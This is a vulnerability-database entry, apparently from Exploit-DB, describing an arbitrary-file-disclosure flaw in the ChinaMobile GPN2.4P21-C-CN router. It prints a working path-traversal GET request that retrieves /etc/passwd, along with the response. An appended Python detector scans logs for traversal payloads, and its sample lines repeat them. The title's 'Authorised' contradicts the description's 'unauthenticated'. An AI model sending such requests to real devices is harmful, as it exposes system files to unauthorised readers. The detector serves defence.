vendor: GPN2.4P21-C-CN
by: Rahul Raz
CVSS: 7.5 (HIGH)
Arbitrary File Disclosure
CWE: 200
Product Name: GPN2.4P21-C-CN
Affected Version From: W2001EN-00
Affected Version To: W2001EN-00
Patch Exists: YES
Related CWE: N/A
CPE: h:chinamobile:gpn2.4p21-c-cn
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Linux
2016

PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure

An unauthenticated attacker can send a specially crafted HTTP GET request to the vulnerable router to disclose arbitrary files from the router's file system. The vulnerable router is GPN2.4P21-C-CN with firmware version W2001EN-00, manufactured by ChinaMobile. The attack has been tested on Ubuntu Linux.

Mitigation:

Authentication should be enabled on the router to prevent unauthorised access. Additionally, the router should be updated to the latest firmware version.

Exploit-DB raw data:

# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
# Date: 28/08/2016
# Exploit Author: Rahul Raz
# Affected Model: GPN2.4P21-C-CN (Firmware - W2001EN-00)
# Vendor: ChinaMobile
# Tested on: Ubuntu Linux
_____________________________________________________

GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
Host: 192.168.59.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=64857d81
Connection: keep-alive

Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/


#root:x:0:0:root:/root:/bin/bash
#root:x:0:0:root:/root:/bin/sh
#root:x:0:0:root:/root:/usr/bin/cmd
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
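
A detection check for the request shown above, added here as an example (it is not part of the original Exploit-DB entry or any vendor code): it scans HTTP request logs for `/cgi-bin/webproc` requests whose `getpage` value resolves outside its base directory, including percent-encoded forms. The log format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log lines in an assumed format: <client> "<METHOD> <target>".
SAMPLE_LOG = [
    '192.168.59.10 "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=setup"',
    '192.168.59.23 "GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=setup"',
    '192.168.59.23 "GET /cgi-bin/webproc?getpage=%2e%2e%2f%2e%2e%2fetc%2fpasswd"',
    '192.168.59.10 "GET /index.html"',
]


def getpage_escapes_root(value, max_decode=3):
    """Return True if a getpage value is absolute or climbs above its base directory."""
    for _ in range(max_decode):  # undo nested percent-encoding, bounded
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if value.startswith("/"):
        return True
    norm = posixpath.normpath(value)
    return norm == ".." or norm.startswith("../")


def suspicious_requests(lines):
    """Return (client, decoded getpage value) for each webproc request that escapes."""
    hits = []
    for line in lines:
        client, _, request = line.partition(" ")
        parts = request.strip('"').split(" ")
        if len(parts) < 2:
            continue  # malformed line, nothing to inspect
        url = urlsplit(parts[1])
        if url.path != "/cgi-bin/webproc":
            continue
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key == "getpage" and getpage_escapes_root(val):
                hits.append((client, val))
    return hits


if __name__ == "__main__":
    for client, page in suspicious_requests(SAMPLE_LOG):
        print(f"ALERT client={client} getpage={page!r}")
```

The same normalise-then-compare logic applies to any parameter that selects a file by relative path; only the path and parameter name in `suspicious_requests` are specific to this router.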